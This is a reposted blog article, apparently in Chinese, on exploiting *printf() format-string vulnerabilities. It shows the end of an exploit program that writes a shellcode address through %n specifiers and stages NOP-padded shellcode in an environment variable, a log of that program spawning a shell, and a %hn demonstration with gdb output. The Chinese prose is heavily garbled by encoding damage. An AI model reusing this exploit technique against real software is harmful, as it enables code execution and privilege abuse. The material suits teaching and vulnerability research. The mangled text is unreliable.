聽(tīng) if (argc > 3) align = atoi(argv[3]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 4) bsize聽(tīng)聽(tīng) = atoi(argv[4]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 5) eggsize = atoi(argv[5]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Usages: %s <RETloc> <offset> <align> <buffsize> <eggsize> \n",argv[0]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)
聽(tīng) if (!(buff = malloc(bsize))) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) }
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

聽(tīng) if (!(egg = malloc(eggsize))) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) printf("Can't allocate memory.\n");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) exit(0);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) }聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Using RET location address: 0x%x\n", retloc);
聽(tīng) shell_addr = get_esp() + offset;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) /* 璁$畻shellcocde鎵鍦ㄧ殑鍦板潃 */聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) printf("Using Shellcode address: 0x%x\n", shell_addr);
聽(tīng)
聽(tīng) SH1 = (shell_addr >> 24) & 0xff;
聽(tīng) SH2 = (shell_addr >> 16) & 0xff;
聽(tīng) SH3 = (shell_addr >>聽(tīng) 8) & 0xff;
聽(tīng) SH4 = (shell_addr >>聽(tīng) 0) & 0xff;

聽(tīng) /* 濡傛灉SH4灝忎簬44,鎴戜滑灝卞澶у畠鐨勫鹼紝璁╁畠絳変簬44 + 1,浠ュ厤鍑虹幇璐熷?*/
聽(tīng) if( (SH4 - 4 - 12 - 4 - 8*3) <= 0) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) oldSH4 = SH4;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) SH4 = 4 + 12 + 4 + 8*3 + 1;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) printf("Using New Shellcode address: 0x%x\n", shell_addr+SH4-oldSH4);
聽(tīng) }
聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr = buff;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) for (i = 0; i <4 ; i++, retloc++ ){
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) memset(ptr,'A',4);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr += 4 ;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) =聽(tīng) retloc & 0xff;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) /* 濉厖retloc+n (n= 0,1,2,3) */聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) = (retloc >> 8聽(tīng) ) & 0xff ;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) = (retloc >> 16 ) & 0xff ;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (*ptr++) = (retloc >> 24 ) & 0xff ;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) }
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) for(i = 0 ; i < 4 ; i++ )
聽(tīng)聽(tīng)聽(tīng)聽(tīng) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) memcpy(ptr, "%c", 2); /* 杈撳叆鏍煎紡涓詫紝璋冩暣%n鎵瀵瑰簲鐨勪綅緗?*/
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr += 2;
聽(tīng)聽(tīng)聽(tīng)聽(tīng) }
聽(tīng)聽(tīng)聽(tīng)聽(tīng) /* "杈撳叆"鎴戜滑鐨剆hellcode鍦板潃 */
聽(tīng)聽(tīng)聽(tīng)聽(tīng) sprintf(ptr, "%%%uc%%n%%%uc%%n%%%uc%%n%%%uc%%n",(SH4 - 4 - 12 - 4 - 8*3),
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) (SH3 - SH4),(SH2 - SH3),(0x0100 + SH1 - SH2) );
聽(tīng)
聽(tīng) ptr = egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = NOP;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < strlen(shellcode); i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = shellcode[i];聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) egg[eggsize - 1] = '\0';聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) memcpy(egg, "EGG=", 4);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) env[0] = egg ;
聽(tīng) env[1] = (char *)0 ;

聽(tīng) execle("./vul","vul",buff + align, NULL,env);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng) /* end of main */聽(tīng)聽(tīng)聽(tīng)聽(tīng)

<- end ->聽(tīng)

楠岃瘉涓涓嬶細(xì)
[warning3@rh62 format]$ ./exp3
Usages: ./exp3 <RETloc> <offset> <align> <buffsize> <eggsize>
Using RET location address: 0xbffffabc
Using Shellcode address: 0xbffffcfa
argv[1] = AA璐憋5綬糀AA鏅嬶5綬糀AA鑿岋5綬糀AA紿ワ5?c%c%c%c%206c%n%2c%n%3c%n%192c%n
bash$ id
uid=500(warning3) gid=500(warning3) groups=500(warning3)
榪欎釜紼嬪簭鍦╮edhat 6.1鍜宺edhat 6.2涓嬪潎楠岃瘉閫氳繃


<4> 鏀誨嚮鏂規(guī)硶涓夛細(xì)澶氭瑕嗙洊榪斿洖鍦板潃(鍒╃敤%hn)
=========================================

鍦╠row鐨剆tatd-toy.c涓張鎻愪緵浜?jiǎn)涓縐嶆柟娉?鍒╃敤%hn,瀹冧細(xì)瑕嗙洊涓涓瓧鐨勯珮16浣嶏細(xì)

main()
{
int a=0x41414141;
printf("a=%#x%hn\n",a,&a);
printf("a=%#x\n",a);
}

[warning3@redhat-6 wuftp]$ ./aa
a=0x41414141
a=0x4141000c

<....>鐢╣db鐪嬩竴涓嬶細(xì)
(gdb) b 5
Breakpoint 1 at 0x80483ea: file aa.c, line 5.
(gdb) r
Starting program: /home/warning3/wuftp/./aa
a=0x41414141

Breakpoint 1, main () at aa.c:5
5聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) printf("a=%#x\n",a);
(gdb) p &a
$1 = (int *) 0xbffffcb4
(gdb) x/4b 0xbffffcb4
0xbffffcb4:聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0x0c聽(tīng)聽(tīng)聽(tīng) 0x00聽(tīng)聽(tīng)聽(tīng) 0x41聽(tīng)聽(tīng)聽(tīng) 0x41

鍥犳鎴戜滑鍙瑕嗙洊涓ゆ灝卞彲浠ヤ簡(jiǎn)錛屽叿浣撶殑鏂規(guī)硶鍜屽墠闈㈢浉浼鹼紝鏈夊叴瓚g殑璇昏呭彲浠ヨ嚜琛屾祴璇曚竴涓嬨?br />榪欑鏂規(guī)硶鐨勫ソ澶勬槸鎴戜滑涓嶄細(xì)瑕嗙洊澶氫綑鐨勫湴鍧錛屽畠鍙鐩栨寚瀹氬湴鍧鐨勪袱涓瓧鑺傚唴瀹癸紒


緇煎悎涓婇潰鐨勫嚑縐嶆柟娉曪紝鎴戜滑浼?xì)鐪嬪埌绗笁鍜尳W洓縐嶆柟娉曟槸鏈閫氱敤鐨勶紝鍙互閫傜敤浜庡悇縐嶆儏鍐點(diǎn)傜
涓縐嶅拰絎簩縐嶉兘鏈夊叾鑷繁鐨勫眬闄愭э紝鏇村鐨勪緷璧栦簬搴旂敤紼嬪簭鑷韓鐨勭壒鐐廣?br />
涓嶈繃榪欏嚑縐嶆柟娉曢兘鐢變竴涓眬闄愶紝灝辨槸蹇呴』闈炲父綺劇‘鐨勭粰瀹氬瓨鏀捐繑鍥炲湴鍧鐨勫湴鍧錛歳etloc,閿欎竴
涓瓧鑺備篃涓嶈銆傝繖浣挎敾鍑葷殑鎴愬姛鐜囧ぇ鎵撴姌鎵c傚洖蹇嗕竴涓嬪師鏉ョ殑鏅歟xploit涓轟粈涔堝鏄撴垚鍔燂紝
鏄洜涓哄畠閫氬父浣跨敤涓涓茶繑鍥炲湴鍧鏉ュ~鍏呭爢鏍堬紝鍙鑳借鐩栬繑鍥炲湴鍧retloc灝卞彲浠ヤ簡(jiǎn)錛屽茍涓嶉渶瑕?br />鐭ラ亾retloc紜垏鐨勫箋傝岃繖閲岋紝鎴戜滑蹇呴』綺劇‘鎸囧畾retloc,灝唖hellcode鍦板潃鐩存帴濉厖鍒拌繑鍥炲湴
鍧涓幓銆傝岀敱浜巖etloc鐨勫ぇ灝忓拰鐢ㄦ埛鐜鍙橀噺絳夊洜绱犳湁寰堝ぇ鍏崇郴錛屽線寰涓嶆槸寰堢‘瀹?涓嶆槸閭d箞
瀹規(guī)槗灝變竴嬈℃垚鍔熺殑銆傞偅涔堝鏋滄垜浠兘澶熸寚瀹氫竴涓瞨etloc,retloc+4,retloc+8...,鍒嗗埆灝?br />shellcode鍦板潃瀛樺埌榪欎簺鍦板潃鍘伙紝閭d箞鎴戜滑涓嶅氨鍙互澧炲ぇ鎴愬姛鐨勬妸鎻′簡(jiǎn)鍚楋紵鍒╃敤絎?縐嶆柟娉曪紝浣?br />寰堝鏄撳仛鍒拌繖涓鐐圭殑銆傚叿浣撶殑鎿嶄綔鏈夊叴瓚g殑璇昏呭彲浠ヨ嚜琛屾祴璇曪紝涔熷彲浠ヤ笌鎴戣仈緋匯?br />

鍙﹀錛?n騫朵笉浠呬粎灞闄愪簬鐢ㄦ潵瑕嗙洊榪斿洖鍦板潃錛屼篃鍙互鐢ㄦ潵瑕嗙洊鏌愪簺淇濆瓨鐨勬暟鎹紝姣斿淇濆瓨
鐨剈id,gid絳夌瓑銆?br />
緇撴潫璇?br />========

榪欑鏍煎紡鍖栦覆瀵艱嚧鐨勬孩鍑洪棶棰橈紝铏界劧鐪嬭搗鏉ユ瘮杈冨鏉傦紝瀹為檯涓婂彧瑕佺▼搴忓憳鍦ㄤ功鍐欏簲鐢ㄧ▼搴?br />鏃剁◢鍔犳敞鎰忥紝鏄畬鍏ㄥ彲浠ラ伩鍏嶇殑銆傜湅鏉ョ矖蹇?jī)鐪熺殑鏄畨鍏ㄧ殑澶ф晫銆?-) 鐢變簬鏃墮棿浠撲績(jī)錛屾枃涓?br />閿欑枏涔嬪闅懼厤錛屾暚璇鋒壒璇勬寚姝c?br />

鍙傝冩枃鐚?br />==========
[1] <<Format Bugs: What are they, Where did they come from,.........
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) How to exploit them>> , lamagra (lamagra@digibel.org)
[2] <<Remote shell via Qpopper2.53>> , prizm (prizm@resentment.org)
[3] <<More info on format bugs>>,聽(tīng) Pascal Bouchareine [ kalou <pb@grolier.fr> ]

Asp 2006-10-20 20:55 鍙戣〃璇勮
]]>*printf()鏍煎紡鍖栦覆瀹夊叏婕忔礊鍒嗘瀽(涓? (杞?http://m.shnenglu.com/asp/archive/2006/10/20/13921.htmlAspAspFri, 20 Oct 2006 12:54:00 GMThttp://m.shnenglu.com/asp/archive/2006/10/20/13921.htmlhttp://m.shnenglu.com/asp/comments/13921.htmlhttp://m.shnenglu.com/asp/archive/2006/10/20/13921.html#Feedback2http://m.shnenglu.com/asp/comments/commentRss/13921.htmlhttp://m.shnenglu.com/asp/services/trackbacks/13921.html

鍓嶈█錛?/h4>=====
鏈榪戜竴孌墊椂闂達(dá)紝涓縐嶆柊鐨勫畨鍏ㄦ紡媧炴寮濮嬪紩璧蜂漢浠敞鎰忥紝灝辨槸璇稿鐨?printf()鍑芥暟鐨勬牸寮?br />鍖栦覆闂銆傚叾瀹炶繖涓棶棰樺簲璇ヨ騫朵笉椴滆錛屽彧鏄竴鐩存病鏈変漢娉ㄦ剰瀹冿紝鐩村埌鏈榪戞墠寮濮嬭繘琛?br />涓浜涙繁鍏ョ殑璁ㄨ銆傛牸寮忓寲涓茬殑闂瀹為檯涓婃槸鐢變簬紼嬪簭鍛樼紪紼嬫椂鐨勭枏婕忔墍瀵艱嚧鐨勶紝涓嬮潰鎴戜滑
灝辨潵鐪嬬湅鍏蜂綋鏄庝箞鍥炰簨銆?br />

鍏充簬鏍煎紡鍖栦覆

============
*printf()鍑芥暟鍖呮嫭printf,聽(tīng)聽(tīng)fprintf,聽(tīng)聽(tīng)sprintf,聽(tīng)聽(tīng)snprintf,聽(tīng)聽(tīng)vprintf, vfprintf,
vsprintf, vsnprintf絳夊嚱鏁幫紝瀹冧滑鍙互灝嗘暟鎹牸寮忓寲鍚庤緭鍑恒備互鏈綆鍗曠殑printf()涓轟緥錛?br />int printf(const char *format, arg1,arg2,...);

閫氳繃瀹氬埗format鐨勫唴瀹?%s,%d,%p,%x...),鐢ㄦ埛鍙互灝嗘暟鎹寜鐓ф煇縐嶆牸寮忚緭鍑恒傞棶棰樻槸錛?br />*printf()鍑芥暟騫朵笉鑳界‘瀹氭暟鎹弬鏁癮rg1,arg2...絀剁珶鍦ㄤ粈涔堝湴鏂圭粨鏉燂紝涔熷氨鏄錛屽畠涓嶇煡
閬撳弬鏁扮殑涓暟銆傚畠鍙細(xì)鏍規(guī)嵁format涓殑鎵撳嵃鏍煎紡鐨勬暟鐩緷嬈℃墦鍗板爢鏍堜腑鍙傛暟format鍚庨潰鍦板潃
鐨勫唴瀹廣傚厛鏉ョ湅涓涓畝鍗曠殑渚嬪瓙錛?br />
<- begin ->聽(tīng)聽(tīng)fmt_test.c

錛僫 nclude <stdio.h>

